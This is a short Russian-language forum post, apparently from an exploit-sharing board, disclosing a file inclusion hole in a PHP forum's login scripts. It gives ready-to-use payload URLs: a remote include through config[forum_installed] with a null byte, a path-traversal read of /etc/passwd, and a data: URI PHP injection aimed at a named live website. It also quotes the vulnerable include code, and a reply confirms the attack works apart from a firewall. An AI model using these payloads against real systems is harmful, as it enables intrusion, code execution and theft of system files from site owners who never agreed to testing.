Показать сообщение отдельно
Старый 07.07.2010, 13:25   #2
Atra Pluvia
 
Регистрация: 07.07.2010
Сообщений: 21
Репутация: 53
По умолчанию

RFI(register globals = On):
../forum/adminLogin.php?config[forum_installed]=http://site/index.php%00
../forum/userLogin.php?config[forum_installed]=../../../../../../../../../etc/passwd%00

Code:

PHP код:
if ( $config['forum_installed'] == '' || $config['forum_installed'] == 'None' ) {
    include_once(
'None_forum.php');
} else {
    include_once(
$config['forum_installed'] . '_forum.php');

http://www.asksizim.com/forum/userLogin.php?config[forum_installed]=data:,<?php echo 'Test';?>

nikp
Работает, там просто файрволл не всё пропускает.
Atra Pluvia вне форума   Ответить с цитированием